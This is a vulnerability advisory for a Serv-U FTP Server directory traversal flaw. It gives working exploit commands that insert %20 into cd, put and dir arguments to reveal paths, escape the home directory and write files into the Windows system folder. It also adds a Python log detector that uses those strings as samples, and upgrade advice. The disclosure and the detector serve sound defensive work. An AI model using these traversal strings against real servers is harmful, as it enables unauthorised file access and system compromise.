A security vulnerability in Serv-U FTP Server allows remote attackers to access files and directories outside the normal scope of the user's FTP home directory. The vulnerability can be used to completely compromise the underlying operating system.
Credit:
The information has been provided by Zoa_Chien.
Vulnerable systems:
Serv-U FTP version 2.4a
Serv-U FTP version 2.5h
Serv-U FTP version 3.0 beta
Immune systems:
Serv-U FTP version 2.5i
By inserting %20 (the hex encoding of a space) into normal GET (file retrieve), PUT (file placement) and CWD (directory change) commands, a remote attacker is able to access directories and files outside the normal security-bounded directory structure.
True path discovery:
Issuing a command with %20 inserted in the middle of a '\..' request causes the FTP server to reveal the true directory location. For example:
cd \.%20.
250 Directory changed to /Ftproot
Directory traversal:
By issuing a command with an inserted %20 in the middle of a '\...' (Note the three '.') request, the FTP server can be forced to provide the user with access to a directory outside the normal scope (beyond the user's home directory):
cd \..%20.
250 Directory changed to /..
cd %20..%20%20../winnt\
250 Directory changed to /c:/TOMB/../WINNT
(NOTE: You can only use this attack when you are in your home directory. So first changing to /winnt and then issuing a "get" will not work)
Putting files outside the scope of the home directory:
The same problem also exists in the PUT command, allowing the following:
put autoexec.bat %20..%20%20../winnt/2.bat
200 PORT Command successful.
150 Opening ASCII mode data connection for 2.bat.
226 Transfer complete.
Exploit summary:
Serv-U FTP Server will:
- Reveal the full path to the ftproot with: cd \.%20. (even if the "show path relative to home dir" option is on). Using pwd will work too.
- Allow read/write/execute/list access to any other file on the partition of the ftproot if you have read/write/exec/list access on your home dir (note that the option "inherit sub directories" must be switched on, otherwise the "cd" command will not work).
- Allow listing of hidden files with "DIR .", even if the "hide hidden files" option is set to on.
- The exploit also works on Serv-U FTP 2.4a, but you have to use a different string: dir %20..%20%20..\*.
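Detection example (added here, not part of the original advisory or of Serv-U): a log check that flags FTP command arguments in which a path component consists only of dots and spaces, which is the shape of every string shown above. The log line format "<client> <user> <VERB> <argument>", the addresses, the user names and the function names are assumptions made for the example.

```python
import re

# Components are separated by either slash; the advisory's strings mix both.
_SEPARATORS = re.compile(r"[\\/]")
# A component built only from dots and spaces, e.g. ". ." or " ..  ..".
_DOTS_AND_SPACES = re.compile(r"[. ]+")


def suspicious_components(argument):
    """Return the components of a path argument that mix dots with spaces."""
    decoded = argument.replace("%20", " ")  # only the encoding the advisory names
    return [
        part
        for part in _SEPARATORS.split(decoded)
        if _DOTS_AND_SPACES.fullmatch(part) and "." in part and " " in part
    ]


def scan_log(lines):
    """Return (client, user, verb, argument) for lines carrying such components.

    Assumed line format: "<client> <user> <VERB> <argument>".
    """
    hits = []
    for line in lines:
        fields = line.split(" ", 3)
        if len(fields) < 4:
            continue  # verb without an argument, or a malformed line
        client, user, verb, argument = fields
        if suspicious_components(argument):
            hits.append((client, user, verb, argument))
    return hits


# Constructed sample log; the flagged arguments are the advisory's own strings.
SAMPLE_LOG = [
    "192.0.2.10 alice CWD pub",
    "192.0.2.10 alice RETR my%20file.txt",  # ordinary space in a file name
    "192.0.2.10 alice CWD ..",              # plain parent reference, not this variant
    "192.0.2.77 guest CWD \\.%20.",
    "192.0.2.77 guest CWD \\..%20.",
    "192.0.2.77 guest CWD %20..%20%20../winnt\\",
    "192.0.2.77 guest STOR %20..%20%20../winnt/2.bat",
    "192.0.2.77 guest LIST %20..%20%20..\\*.",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The same predicate can be used to reject a request before the path is resolved, since no legitimate file or directory name consists solely of dots and spaces.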
Solution:
Upgrade to version 2.5i, available at:
http://ftpserv-u.deerfield.com/download/